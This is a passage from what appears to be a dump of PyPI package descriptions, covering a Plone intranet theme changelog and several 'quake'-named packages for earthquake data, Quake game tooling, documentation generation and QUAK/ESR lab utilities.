Pisa]Updated bundle so that redactor triggers the change event. Needed for autosave [Alexander Pilz]new bundle where redactor triggers the change event [Alexander Pilz]Fix fallback rules to only catch if a visual portal wrapper is present [Alexander Pilz]updated diazo [Alexander Pilz]added rule for posts [Alexander Pilz]Rulefix for calendar [Alexander Pilz]Rules for calendar [Alexander Pilz]update diazo [Alexander Pilz]Updated proto [Alexander Pilz]Added default user icons [Alexander Pilz]Also copy defaultusers [Alexander Pilz]Remove empty.html fallback [Cillian de Roiste]update diazo [Alexander Pilz]Move main_template test over from ploneintranet.theme and fix plone.app.blocks dependency [Guido A.J. Stevens]Move dependencies and registry setup/uninstall from theme refshttps://github.com/quaive/ploneintranet/commit/dba9d8b09b10ac15a1f3e6274d11cd0437ae1fdd[Guido A.J. Stevens]Audit zope.Public refshttps://github.com/quaive/ploneintranet/issues/765[Guido A.J. Stevens]make diazo [Alessandro Pisa]Consolidate news rules [Guido A.J. Stevens]Added empty placeholder app icon [Manuel Reinhardt]Don\u2019t depend on section ids (controlled by content editors) [Guido A.J. Stevens]Reorganize diazo rules [Guido A.J. Stevens]Update some outdated rules [Guido A.J. Stevens]Hook up news publisher template [Guido A.J. Stevens]Hook up news app, refs #337 [Guido A.J. Stevens]Back to development: 1.3.0a10 [Guido A.J. Stevens]1.3.0a9 (2016-09-16)Update changelog [Guido A.J. Stevens]Update proto from c2ab9deba47758a383d029f8541c236b6990509 [Guido A.J. Stevens]Give a preview to this theme [Alessandro Pisa]Back to development: 1.3.0a9 [Alexander Pilz]1.3.0a8 (2016-09-14)Update proto [pilz]Update bundle which now cleans up the moment-timezone messup, reducing size\n[pilz]Include rule for calendar app\n[pilz]1.3.0a7 (2016-09-12)Fix manifest [Guido A.J. Stevens]Update changelog [Guido A.J. Stevens]Fix regression that broke workspace subclasses [Guido A.J. Stevens]actually write converted files to the diazo dir [Alexander Pilz]Also view the mails [Alessandro Pisa]update bundle [Alexander Pilz]Back to development: 1.3.0a7 [Alexander Pilz]1.3.0a6 (2016-08-31)Prototype Style update1.3.0a5 (2016-08-31)Diazo rules update1.3.0a4 (2016-08-29)Prototype Style update1.3.0a3 (2016-08-25)Fix merge regression that damaged 85c37862a8e2 [Guido A.J. Stevens]1.3.0a2 (2016-08-25)Shell change1.3.0a1 (2016-08-22)Initial version implementing the shell change1.2.5 (2016-08-19)Monkey scroll fix directly into bundle. Seehttps://github.com/Patternslib/Patterns/pull/455[Guido A.J. Stevens]1.2.4 (2016-08-18)Extra release to verify that 1.2.3. was not a brownbag release.fix postrelease typo [Guido A.J. Stevens]1.2.3 (2016-08-18)New bundle with the actual inject API change, finally [Guido A.J. Stevens]Update Makefile to remove old releases, update symlinks to actually point to LATEST [Guido A.J. Stevens]Revert \u201cUpdated from prototype\u201d [Guido A.J. Stevens]Fix Makefile to handle bundle again, add new bundle [Alexander Pilz]new bundle [Alexander Pilz]update patternslib to includehttps://github.com/Patternslib/Patterns/pull/452/commits/35e59cba63aa6e51a35b1fe4a0df79d391462849Back to development: 1.2.3 [Alexander Pilz]1.2.2 (2016-08-18)Pull in another Patternslib:inject_delay [Guido A.J. Stevens]1.2.1 (2016-08-10)Pull in Patternslib:inject_delay [Guido A.J. Stevens]1.2.0 (2016-08-08)Remove FIXME, ongoing work in quaive/ploneintranet:update-proto will fix that [Guido A.J. Stevens]Hook up global messaging counter + link [Guido A.J. Stevens]Hook up messaging [Guido A.J. Stevens]Sort uninstaller downwards [Guido A.J. Stevens]Promote theme profile installer in GS/QI UI [Guido A.J. Stevens]Back to development: 1.2.0a4 [Guido A.J. Stevens]1.2.0a3 (2016-08-01)Remove circular ploneintranet <-> resources dependency, disable autoinclude [Guido A.J. Stevens]Modernize setup.py author pointers [Guido A.J. Stevens]Theme updated to pull in mail content type related stuff [Alessandro Pisa]Updated the Makefile [Alessandro Pisa]1.2.0a2 (2016-07-27)Modified the rules.xml as in quaive/ploneintranet#510 [ale-rt]1.2.0a1 (2016-07-26)Updated static folder after quaive/ploneintranet#476 [ale-rt]1.2.0a0 (2016-07-25)Inital release [ale-rt]"} +{"package": "quake", "pacakge-description": "quake.360.cn\u7684API\u5e93Free software: MIT licenseDocumentation:https://quake.readthedocs.io.CreditsThis package was created withCookiecutterand thekin9-0rz/cookiecutter-pypackageproject template."} +{"package": "quake3rcon", "pacakge-description": "quake3rconA tiny library for using Quake 3's RCON protocol feature for some game servers likeFiveM.\nThe RCON protocols are used to remotely control game servers, i.e. execute commands on a game server and receive the respective results.LicenseMIT LicenseCopyright (c) 2022 hellyetPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.class Rconfunctionargsreturnsdescription__init__ip (ip), port (int), password (str), timeout (float, optional)NoneInitialize rcon connection__del__NoneNoneClose rcon connection on object destructionrecvNoneNoneGets server responsesendcommand (str)strSend rcon commandHow i can use this?To install runpip install quake3rconThis is an example using q3rcon-py in your codefromquake3rcon.rconimportRconrcon=Rcon('192.168.0.1',30120,'yourstrongpassword')# Connecting to RCONresponce=rcon.send('command and some args for it')# Send RCON commandprint(responce)# Show server response# Do some stuffdelrcon# Delete object and disconnect from RCON"} +{"package": "quakeanalysis", "pacakge-description": "This is prototype to analyse earthquake data fromhttps://earthquake.usgs.gov/https://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.phpenter a place name to get distance from nearest earthquakeearthquake_distance(\u2018place\u2019)enter a place name to get time of nearest earthquakeearthquake_time(\u2018place\u2019)enter a place name to get place of nearest earthquakeearthquake_place(\u2018place\u2019)enter a place name to get longitude of nearest earthquakeearthquake_longitude(\u2018place\u2019)enter a place name to get latitude of nearest earthquakeearthquake_latitude(\u2018place\u2019)get the magnitude of nearest earthquakeearthquake_magnitude(\u2018place\u2019)To get dataframe list of all recent earthquakes and their distance from placeearthquake_df(\u2018place\u2019)To get dataframe list of all recent earthquakes and their distance from place, where distance less than 5000\nearthquake_less_than(\u2018Tokyo\u2019, 5000)Check out how to use this libraryhttps://betterprogramming.pub/python-library-for-finding-nearest-earthquake-8c96f97c9ddbhttps://github.com/g00387822/quakeanalysisChange Log0.0.1 (03/06/2022)First Release0.0.2 (03/06/2022)Second Release0.0.3 (03/06/2022)Third Release0.0.4 (03/06/2022)Fourth Release0.0.5 (03/06/2022)Fifth Release0.0.6 (04/06/2022)Sixth Release0.0.7 (04/06/2022)Seventh Release0.0.8 (14/06/2022)Eigth Release0.0.9 (14/06/2022)Ninth Release0.1.0 (15/06/2022)Tenth Release0.1.1 (18/06/2022)Eleventh Release0.1.2 (18/06/2022)Twelfth Release0.1.3 (18/06/2022)Thirteenth Release0.1.4 (18/06/2022)Fourteenth Release0.1.5 (18/06/2022)Fifteenth Release0.1.6 (18/06/2022)Sixteenth Release0.1.7 (19/06/2022)Seventeenth Release"} +{"package": "quake-cli-tools", "pacakge-description": "quake-cli-toolsquake-cli-tools is a set of command line tools for creating Quake content.Installation$pipinstallquake-cli-toolsToolspak: Add files to a PAK file.unpak: Extract files from a PAK file.wad: Add file to a WAD file.unwad: Extract files from a WAD file.bsp2wad: Create a WAD file from a BSP file.qmount: Mount a PAK file as a drive.image2spr: Create an SPR from image files.spr2image: Extract frames from an SPR.bsp2svg: Create an SVG file from a BSP file.ContributingHave a bug fix or a new feature you'd like to see in quake-cli-tools? Send it our way! Please make sure you create an issue that addresses your fix/feature so we can discuss the contribution.Fork this repo!Create your feature branch:git checkout -b features/add-cool-new-toolCommit your changes:git commit -m 'Adding must have new tool!'Push the branch:git push origin features/add-cool-new-toolSubmit a pull request.Create anissue.LicenseMITSee thelicensedocument for the full text."} +{"package": "quakefeeds", "pacakge-description": "Python 3 tools for handling USGS earthquake data feeds.Thequakefeedspackage provides a classQuakeFeedthat captures data\nfrom a GeoJSON feed, given a valid severity level and time period.\nThe class provides some shortcuts for accessing data of interest within\nthe feed and provides other useful methods - e.g. one to generate a simple\nGoogle map plotting quake locations and magnitudes.The data feeds and a description of their GeoJSON format are available athttp://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php.Examples of Use>>>fromquakefeedsimportQuakeFeed>>>feed=QuakeFeed(\"4.5\",\"day\")>>>feed.title'USGS Magnitude 4.5+ Earthquakes, Past Day'>>>feed.timedatetime.datetime(2015,4,16,19,18,39,tzinfo=datetime.timezone.utc)>>>len(feed)6>>>feed[0]{'properties':{'cdi':1,'tsunami':0,'alert':None,...}# full JSON data for first event in feed>>>feed.location(0)[26.8608,35.135]>>>feed.magnitude(0)6.1>>>feed.event_title(0)'M 6.1 - 47km SW of Karpathos, Greece'>>>feed.depth(0)20.86>>>feed.depths>>>list(feed.depths)[20.86,46.35,76.54,48.69,10,28.64]>>>map1=feed.create_google_map()>>>map2=feed.create_google_map(style=\"titled\")>>>feed.write_google_map(\"map.html\",style=\"titled\")ScriptsThe installation process will install some scripts in addition to thequakefeedspackage:quakemap, which plots earthquakes on a Google mapquakestats, which computes basic statistics for a feedDependenciesPython 3RequestsJinja2template engine (for map generation)docopt(for the scripts)InstallationUsepipto install the package, its scripts\nand their dependencies:pip install quakefeedsAlternatively, you can install from within the unpacked source distribution:python setup.py install(Note that this requires prior installation ofsetuptools.)If you don\u2019t want the scripts, copying thequakefeedsdirectory from\nthe source distribution to somewhere in your PYTHONPATH will suffice."} +{"package": "quakeflow", "pacakge-description": "quakeflow"} +{"package": "quakeformer", "pacakge-description": "No description available on PyPI."} +{"package": "quake-inverse-squareroot", "pacakge-description": "quake 3's fastest inverse square rootThis module is a port from Quake 3's inverse square root algorithm.InstallationGet yourself a C compiler (like gcc, clang or msvc)Runpython setup.py installEnjoy!BuildGet yourself a C compiler (like gcc, clang or msvc)Runpython setup.py build bdist_wheel sdistCheck thedistfolder for the wheel and source distributionDocumentationquake_inverse_sq.coarse_inv_sqrt(number: float) -> floatThis is fastest inverse square root algorithm. It is not as accurate as thequake_inverse_sq.fined_inv_sqrtfunction, but it is much faster. It is implemented from thiswikipediaquake_inverse_sq.fined_inv_sqrt(number: float) -> floatThis is the original inverse square root algorithm. It is more accurate than thequake_inverse_sq.coarse_inv_sqrtfunction, but it is slower. It is implemented frommath.h"} +{"package": "quakeio", "pacakge-description": "quake-ioQuakeIO is a library of utilities for parsing ground motion files. Interfaces are provided for Python, Matlab, and the command line.InstallFormatsPython APIFormatsFormatReadWriteReference[quakeio.]json\u2611\u2611schemacsmip\u2610\u2610csmip.v2\u2611\u2610CSMIPeqsig\u2611\u2611eqsigPEER.NGA\u2611\u2610plain.tsv\u2610\u2610opensees\u2610\u2611plain.csv\u2610\u2610mdof\u2610\u2610SimCenter.Event\u2610\u2610InstallRun the following command:pipinstallquakeio"} +{"package": "quakemigrate", "pacakge-description": "QuakeMigrateis a Python package for automatic earthquake detection and location using waveform migration and stacking.Key FeaturesQuakeMigrate uses a waveform migration and stacking algorithm to search for coherent seismic phase arrivals across a network of instruments. It produces\u2014from raw data\u2014catalogues of earthquakes with locations, origin times, phase arrival picks, and local magnitude estimates, as well as rigorous estimates of the associated uncertainties.The package has been built with a modular architecture, providing the potential for extension and adaptation at numerous entry points. This includes, but is not limited to:the calculation or import of traveltime gridsthe choice of algorithm used to identify phase arrivals (for example by kurtosis, cross-covariance analysis between multiple components, machine learning techniques and more)the stacking function used to combine onset functionsthe algorithm used to perform phase pickingDocumentationDocumentation for QuakeMigrate is hostedhere.InstallationDetailed installation instructions can be foundhere.If you're comfortable with virtual environments and just want to get started, QuakeMigrate is available via the Python Package Index, and can be installed via pip:pip install quakemigrateUsageWe are working on tutorials covering how each individual aspect of the package works, as well as example use cases where we provide substantive reasoning for the parameter choices used. These examples include applications to cryoseismicity and volcano seismology.This is a work in progress -see our documentation for full details.Examples you can run in your browserTo quickly get a taste for how the software works, try out the two icequake examples hosted on Binder:Icequakes at the Rutford Ice Stream, AntarcticaIcequakes at the Skei\u00f0ar\u00e1rj\u00f6kull outlet glacier, IcelandAnd for a more comprehensive demonstration of the options available, see thetemplate scripts.CitationIf you use this package in your work, please cite the following conference presentation:Winder, T., Bacon, C.A., Smith, J.D., Hudson, T., Greenfield, T. and White, R.S., 2020. QuakeMigrate: a Modular, Open-Source Python Package for Automatic Earthquake Detection and Location. In AGU Fall Meeting 2020. AGU.as well as the relevant version of the source code onZenodo.We hope to have a publication coming out soon:Winder, T., Bacon, C.A., Smith, J.D., Hudson, T.S., Drew, J., and White, R.S. QuakeMigrate: a Python Package for Automatic Earthquake Detection and Location Using Waveform Migration and Stacking. (to be submitted to Seismica).Contributing to QuakeMigrateContributions to QuakeMigrate are welcomed. Whether you have identified a bug or would like to request a new feature, your first stop should be to reach out, either directly or\u2014preferably\u2014via the GitHub Issues panel, to discuss the proposed changes. Once we have had a chance to scope out the proposed changes you can proceed with making your contribution following the instructions in ourcontributions guidelines.Bug reports, suggestions for new features and enhancements, and even links to projects that have made use of QuakeMigrate are most welcome.ContactYou can contact us directly at:quakemigrate.developers@gmail.comAny additional comments/questions can be directed to:Tom Winder-tom.winder@esc.cam.ac.ukConor Bacon-conor.bacon@cantab.netLicenseThis package is written and maintained by the QuakeMigrate developers, Copyright QuakeMigrate developers 2020\u20132023. It is distributed under the GPLv3 License. Please see theLICENSEfile for a complete description of the rights and freedoms that this provides the user."} +{"package": "quakephase", "pacakge-description": "No description available on PyPI."} +{"package": "quaker", "pacakge-description": "QuakerDocsQuakerDocs is a modern and reliable static documentation generator. It\nwas designed from the ground up to replace older documentation\ngenerators. It generates a fully static web page with your\ndocumentation, so it can work without a server. Some of the features\nthat QuakerDocs has are:Fast generation of a static websiteWrite documentation using reStructuredTextSuper-fast live searchHandy bookmarking systemEasily configurableOnly takes one command!Getting Started with QuakerDocsQuakerDocs is very easy to use, and you do not need a lot to get\nstarted!InstallationFirst of all, make sure you have Clang and the LLVM wasm-compiler installed.For example, on Ubuntu:apt install clang lldThen, to install the QuakerDocs application use the following command:pip install quakerAfter running this command all the requirements are installed and you can\nimmediately use the quaker command.QuickstartTo create an example quickstart project in a directory, you can use the\nfollowing command:quaker --init This command creates a directory with some of the necessary files to get\nyou started such asconf.py, andindex.rst.UsageTo use QuakerDocs to turn your RST or Markdown files into static\nwebpages you need the follow these steps:Open the directory containing yourconf.pyin the terminal.cd path/to/my/project/To convert your documentation files into static webpages, run the\nfollowing command.quaker .Change into thebuild/directory, and start a webserver.cd build/\npython3 -m http.serverTo visit the generated documentation page visitlocalhost:8000in\nyour web browser."} +{"package": "quaker-db", "pacakge-description": "QuakerLightweight python API to USGS earthquake dataset.API Docs are located hereInstallationClone the repo to your system and install$gitclonehttps://github.com/BlakeJC94/quaker.git\n$cdquaker\n$pipinstall.QuickstartThis package comes equipped with a batteries-included CLI interface for downloading the latest\nearthquake event data in CSV, GeoJSON, and plain text format from the USGS database.usage: quaker [-h] [--format VAL] [--endtime TIME] [--starttime TIME] [--updatedafter TIME] [--minlatitude LAT]\n [--minlongitude LNG] [--maxlatitude LAT] [--maxlongitude LNG] [--latitude LAT] [--longitude LNG]\n [--maxradius VAL] [--maxradiuskm DIST] [--catalog VAL] [--contributor VAL] [--eventid VAL]\n [--includeallmagnitudes BOOL] [--includeallorigins BOOL] [--includedeleted VAL]\n [--includesuperceded BOOL] [--limit VAL] [--maxdepth VAL] [--maxmagnitude VAL] [--mindepth VAL]\n [--minmagnitude VAL] [--offset VAL] [--orderby VAL] [--alertlevel VAL] [--callback VAL]\n [--eventtype VAL] [--jsonerror BOOL] [--kmlanimated BOOL] [--kmlcolorby VAL] [--maxcdi VAL]\n [--maxgap VAL] [--maxmmi VAL] [--maxsig VAL] [--mincdi VAL] [--minfelt VAL] [--mingap VAL]\n [--minsig VAL] [--producttype VAL] [--productcode VAL] [--reviewstatus VAL]\n [mode]\n\nAccess USGS Earthquake dataset API Docs: https://earthquake.usgs.gov/fdsnws/event/1/ NOTE: All times use\nISO8601 Date/Time format (yyyy-mm-ddThh:mm:ss). UTC is assumed. NOTE: Minimum/maximum longitude values may\ncross the date line at 180 or -180\n\npositional arguments:\n mode action to perform (default: download)\n\noptional arguments:\n -h, --help show this help message and exit\n\nFormat:\n --format VAL specify the output format (one of \"csv\", \"geojson\", \"kml\", \"quakeml\", \"text\", or\n \"xml\").\n\nTime:\n --endtime TIME limit to events on or before the specified end time.\n --starttime TIME limit to events on or after the specified start time.\n --updatedafter TIME limit to events updated after the specified time.\n\nLocation - rectangle:\n --minlatitude LAT limit to events with a latitude larger than the specified minimum [-90, 90].\n --minlongitude LNG limit to events with a longitude larger than the specified minimum [-360, 360].\n --maxlatitude LAT limit to events with a latitude smaller than the specified maximum [-90, 90].\n --maxlongitude LNG limit to events with a longitude smaller than the specified maximum [-360, 360].\n\nLocation - circle:\n --latitude LAT specify the latitude to be used for a radius search [-90, 90].\n --longitude LNG specify the longitude to be used for a radius search [-180, 180].\n --maxradius VAL limit to events within the specified maximum number of degrees from the geographic\n point defined by the latitude and longitude parameters [0, 180].\n --maxradiuskm DIST limit to events within the specified maximum number of kilometers from the geographic\n point defined by the latitude and longitude parameters [0, 20001.6].\n\nOther:\n --catalog VAL limit to events from a specified catalog.\n --contributor VAL limit to events contributed by a specified contributor.\n --eventid VAL select a specific event by id; event identifiers are data center specific.\n --includeallmagnitudes BOOL\n specify if all magnitudes for the event should be included.\n --includeallorigins BOOL\n specify if all origins for the event should be included.\n --includedeleted VAL specify if deleted products and events should be included. the value \"only\" returns\n only deleted events. values \"true\" or \"false\" are typecast to bool.\n --includesuperceded BOOL\n specify if superseded products should be included. this also includes all deleted\n products, and is mutually exclusive to the includedeleted parameter.\n --limit VAL limit the results to the specified number of events.\n --maxdepth VAL limit to events with depth less than the specified maximum.\n --maxmagnitude VAL limit to events with a magnitude smaller than the specified maximum.\n --mindepth VAL limit to events with depth more than the specified minimum.\n --minmagnitude VAL limit to events with a magnitude larger than the specified minimum.\n --offset VAL return results starting at the event count specified, starting at 1.\n --orderby VAL order the results (one of \"time\", \"time-asc\", \"magnitude\", or \"magnitude-asc\").\n\nExtensions:\n --alertlevel VAL limit to events with a specific pager alert level (one of \"green\", \"yellow\", \"orange\",\n or \"red\").\n --callback VAL convert geojson output to a jsonp response using this callback.\n --eventtype VAL limit to events of a specific type\n --jsonerror BOOL request json(p) formatted output even on api error results. (only for geojson format)\n --kmlanimated BOOL whether to include timestamp in generated kml, for google earth animation support.\n --kmlcolorby VAL how earthquakes are colored (one of \"age\", \"depth\").\n --maxcdi VAL maximum value for maximum community determined intensity reported by dyfi [0, 12].\n --maxgap VAL limit to events with no more than this azimuthal gap [0, 360].\n --maxmmi VAL maximum value for maximum modified mercalli intensity reported by shakemap [0, 12].\n --maxsig VAL limit to events with no more than this significance.\n --mincdi VAL minimum value for maximum community determined intensity reported by dyfi [0, 12].\n --minfelt VAL limit to events with this many dyfi responses.\n --mingap VAL limit to events with no less than this azimuthal gap [0, 360].\n --minsig VAL limit to events with no less than this significance.\n --producttype VAL limit to events that have this type of product associated.\n --productcode VAL return the event that is associated with the productcode.\n --reviewstatus VAL limit to events with a specific review status (one of \"all\", \"automatic\", or\n \"reviewed\").Runquaker downloadand specify the parameters as keyword arguments and pipe the output to any\nlocation:$quakerdownload--formatcsv--starttime2022-08-01--endtime2022-09-01>earthquake_data.csvFor more details on the available query parameters, usequaker --helpor view theUSGS documentation.Using the python API is also fairly straight-forward:>>>fromquakerimportQuery,Client>>>client=Client()# An empty query defaults to all events in the last 30 days>>>events_from_last_30_days=Query()>>>client.execute(events_from_last_30_days,output_file=\"./path/to/example/output_1.csv\")# Large multi-page queries can also be handled>>>events_from_last_5_months=Query(...format=\"csv\",...starttime=\"2022-05-01\",...endtime=\"2022-10-01\",...)>>>client.execute(events_from_last_5_months,output_file=\"./path/to/example/output_2.csv\")# Calling `client.execute` without an output file return results as a pandas DataFrame>>>results=client.execute(events_from_last_5_months)# You can filter results by location using the API>>>fields={...\"format\":\"csv\",...\"starttime\":\"2022-08-01\",...\"endtime\":\"2022-09-01\",...\"latitude\":35.652832,...\"longitude\":139.839478,...\"maxradiuskm\":120.0,...\"minmagnitude\":3.0,...}>>>events_in_august_in_120km_within_tokyo_above_mag_3=Query(**fields)>>>client.execute(...events_in_august_in_120km_within_tokyo_above_mag_3,...output_file=\"./path/to/example/output_3.csv\"...)# See `help(Query)` and https://earthquake.usgs.gov/fdsnws/event/1/ for more detailsContributingThis is a small personal project, but pull requests are most welcome!Code is styled using[black](https://github.com/psf/black)(pip install black)Code is linted withpylint(pip install pylint)Requirements are managed usingpip-tools(runpip install pip-toolsif needed)Add dependencies by adding packages tosetup.pyand runningpip-compileSemantic versioningis used in this repoMajor version: rare, substantial changes that break backward compatibilityMinor version: most changes - new features, models or improvementsPatch version: small bug fixes and documentation-only changesVirtual environment handling bypoetryis preferred:# in the project directory$poetryinstall\n$poetryshell"} +{"package": "quakerheritage", "pacakge-description": "quakerHeritageProject to support the collation of PDF data on the Quaker Meeting House Heritage Project into a databaseDependenciesRequired Python Libariesbs4numpypandaspdfplumberrequestsDisclaimerThis project has been specifically coded for the Quaker Meeting House Heritage Project, both in hard-coded variables, and hard-coded parameters for extracting text. It is a tool to suit a very specific use-case and may not work if used otherwise. The project further depends on the files required being listed online at the URLs provided. If Britain Yearly Meeting takes down the website and associated pdfs, back-ups are available on the Internet Archive's Wayback Machine. The code can also be adapted to work with locally downloaded pdfs. go to Appendix: Hosting Errors to note the required changes.Installationpip install quakerheritageHow-To UseSimply run the following command:python -m quakerheritage.buildYou will be prompted to select a location for the csv output to be placed. Once chosen, the code will run quietly in the background until complete, and the csv available at your chosen directory as 'quakerHeritageDB.csv'ContributingFeedback is both welcome and encouraged. If you use the code, or just find issues while browsing, please report them byclicking here.LicenceDistributed underAGPL version 3.0ContactFor queries please reach out via GitHub by either raising an issue or contacting me directly.https://github.com/aclayden"} +{"package": "quakesaver-client", "pacakge-description": "QuakeSaver ClientThis is the client for theQuakeSaverSensor services.You can find the documentationhere.Getting StartedSetting up the clientEMAILandPASSWORDcorrespond to the credentials you use to log in athttps://network.quakesaver.net.fromquakesaver_clientimportQSCloudClientEMAIL=\"user@yourorganisation.net\"PASSWORD=\"!verstrongpassword1\"client=QSCloudClient(email=EMAIL,password=PASSWORD)Example to stream from the cloudAuthenticate against the quakesaver server and download raw, as well as processed data.Please note, that for security reasons each login session is only valid for 15 minutes. Thus, the client is not designed for long-term connections but for repeated queries.\"\"\"Example script for quakesaver_client usage.\"\"\"importsysfromdatetimeimportdatetime,timedeltafrompprintimportppimportobspyfromobspyimportStreamfromquakesaver_clientimportQSCloudClientfromquakesaver_client.models.data_product_queryimportDataProductQueryfromquakesaver_client.models.measurementimportMeasurementQueryEMAIL=\"user@yourorganisation.net\"PASSWORD=\"!verstrongpassword1\"DATA_PATH=\"./data\"client=QSCloudClient(email=EMAIL,password=PASSWORD)# Get a list of all available sensor IDs:sensor_ids=client.get_sensor_ids()pp(sensor_ids)iflen(sensor_ids)==0:print(\"No sensors available\")sys.exit()# For demonstration, we use the first sensor in the listsensor_uid_to_get=sensor_ids[0]# Get the sensor from the clientsensor=client.get_sensor(sensor_uid_to_get)pp(sensor.dict())# Queries such as waveforms, station metadata and measurements (data products calculated# on the sensor)# require that you select a time window. We use that last 5 hours of dataend_time=datetime.utcnow()start_time=end_time-timedelta(hours=5)# Query various Measurements. In this case we calculate a rolling `mean` over 10 minutes# time windows.# Other `aggregators` are:# * None (default)# * max# * minquery=MeasurementQuery(start_time=start_time,end_time=end_time,interval=timedelta(minutes=10),aggregator=\"mean\",)result=sensor.get_jma_intensity(query)print(result)result=sensor.get_peak_ground_acceleration(query)print(result)result=sensor.get_spectral_intensity(query)print(result)result=sensor.get_rms_offset(query)print(result)# Query various Data Products. You can only get 100 results at once, which is why there# are limit and skip values. You can get data products from a specific time frame, by# specifying start and end times.end_time=datetime.utcnow()start_time=end_time-timedelta(hours=5)query=DataProductQuery(start_time=start_time,end_time=end_time,limit=100,skip=0,)result=sensor.get_event_records(query)print(result)result=sensor.get_hv_spectra(query)print(result)result=sensor.get_noise_autocorrelations(query)print(result)# Download station meta data as StationXML and store them in a local directory.file_path=sensor.get_stationxml(starttime=start_time,endtime=end_time,level=\"response\",location_to_store=DATA_PATH,)withopen(file_path,\"r\")asfile:print(file.read())# Download raw full waveforms from the sensor. Note that you can only query what is in# the sensor's ringbuffer (usually the last ~ 48 hours).file_path=sensor.get_waveform_data(start_time=start_time,end_time=end_time,location_to_store=DATA_PATH)# Read the file into obspy for further processing...stream:Stream=obspy.read(file_path)fortraceinstream.traces:print(trace.stats)QSLocalClientExamplesInteract with sensors on your local network using theQSLocalClient.Streaming Dataimportasynciofromquakesaver_clientimportQSLocalClientasyncdefrun():client=QSLocalClient()sensor=client.get_sensor(\"qssensor.local\")stream=sensor.get_waveform_stream()asyncforchunkinstream.start():print(chunk)asyncio.run(run())Downloading DataDownload the latest 10 minutes from a local sensor and write that into a file:importdatetimefromquakesaver_clientimportQSLocalClientclient=QSLocalClient()sensor=client.get_sensor(\"qssensor.local\")tmax=datetime.datetime.utcnow()tmin=tmax-datetime.timedelta(minutes=10)file_path=sensor.get_waveform_data(tmin,tmax)print(file_path)"} +{"package": "quakesranalysis-tspspi", "pacakge-description": "QUAK/ESR analysis utilityThis is work in progress.This repository contains a collection of classes and utilities to handle\nand work with QUAK/ESR data files.Installationpip install quakesranalysis-tspspiUpgradingpip install --upgrade quakesranalysis-tspspiUtilitiesquakesrplotThequakesrplotis capable of generating standard plots for single peak\nscans and 1D scans. Those include:iqmeanis just a standard plot of the mean values and standard deviations\nof all captured I/Q samples in scan, zero scan and differenceapmeancalculated amplitude and phase out of I/Q samples and plots\nthem for scan, zero scan and differencewndnoiseprovides a sliding window noise calculation by calculating the\nstandard deviation inside this configurable sliding window to show how noise\nchanges over time.offsettimeplots the offset of all three captured signal types over timeallancalculates the Allan deviation of the system for all samples points\nalong the main axis (frequency, B0, ...) as well as a worst case Allan deviationdecomposedecomposes the found signal, zero signal and difference signal\ninto a mixture of Gaussians (this can be inspected by settingdecomposedebug)mixfitdoes the same as decompose but for more different function types (Gaussian,\nCauchy, Difference of Gaussian, Difference of Cauchy, Constant, ...). Inspection\nof the fitting behaviour is also possible usingmixfitdebugmetricsoutputs collected metrics into a JSON data file. This should be\nrun at the end.All plots are stored along the source datafile and named with the same prefix.Example usage:quakesrplot -iqmean -apmean -wndnoise 10 -wndnoise 3 -offsettime -mixfit -allan *_peak.npzTo see a list of all supported features execute without arguments:quakesrplotWhen outputting debug plots fordecomposeormixfittheQtAggbackend\nofmatplotlibtends to crash sometimes. One can then launch the application using\na different backend such asTkAggon via theMPLBACKENDenvironment variable:env MPLBACKEND=tkagg quakesrplot -iqmean -apmean -wndnoise 10 -wndnoise 3 -offsettime -mixfitdebug -allan *_peak.npzquakesrsliceThequakesrsliceutility is capable of slicing nD scans (1D/2D scans)\ninto separate.npzfiles.Usage: quakesrslice [OPTIONS] FILENAMES\n\nSlices nD scans into single NPZs\n\nOptions:\n\\t--outdir DIRECTORY\n\\t\\tWrite all sliced NPZs into the specified output directory (setable\n\\t\\tonly once for all input files)quakesrfetchUsage: quakesrfetch [OPTIONS] FROMDATE [TODATE]\n\nFetches all NPZ and run files from QUAK/ESR runs from the configured\nmeasurement directory that are taken since the specified dates and times.\nIf no end date is specified all runs starting from the given timestamp will\nbe fetched.\n\nThe date and timestamps can be supplied either as\n\n\tYYYYMMDD\n\t\tWhen addressing a whole day\n\tYYYYMMDDHHMMSS\n\t\tWhen adressing a given date and time\n\nOptions:\n\t--outdir DIRECTORY\n\t\tWrite all fetched NPZs into the specified output directory\n\t--list\n\t\tAlso write a list of fetched NPZs onto standard output to be passed\n\t\tto an analysis tool\n\t--sshkey KEYFILE\n\t\tSpecified the SSH keyfile to use. It's assumed to be a passwordless (!)\n\t\tkeyfile ..."} +{"package": "quakesrrtdisplay-tspspi", "pacakge-description": "QUAK/ESR realtime data displayQuick and dirty visualization of data published by a specific experimental\nsetup via MQTTInstallationpip install quakesrrtdisplay-tspspiNote: On our experimental systems this is deployed automatically by\nJenkins also on updates.Default configurationThe connection dialog can be filled with default credentials. This\nis done by a~/.config/quakesrdisplay/connection.confthat contains\na simple JSON structure supplying the values (password also not encrypted):{\n \"broker\" : '127.0.0.1',\n \"port\" : '1883',\n \"user\" : 'someMQTTusername',\n \"password\" : 'anyPassword',\n \"basetopic\" : 'quakesr/experiment'\n}"} +{"package": "quakesrthorcam-tspspi", "pacakge-description": "QUAK/ESR ThorCam interfaceNote:Work in progressThis is a small Python service that runs on a Windows machine to which the\nThorCam is attached to provide a bridge into the control system that has\nbeen realized on an OpenSource platform - it exposes an MQTT interface for\nconfiguration of camera settings and queue configuration as well as event signalling\nand allows to transfer images taken using SFTP.Since the required .NET library to interface with the not so simple to handle\nclosed source ThorCam library this application only runs on Windows.Installationpip install quakesrthorcam-tspspiConfiguration fileMQTT sectionThe MQTT section configures 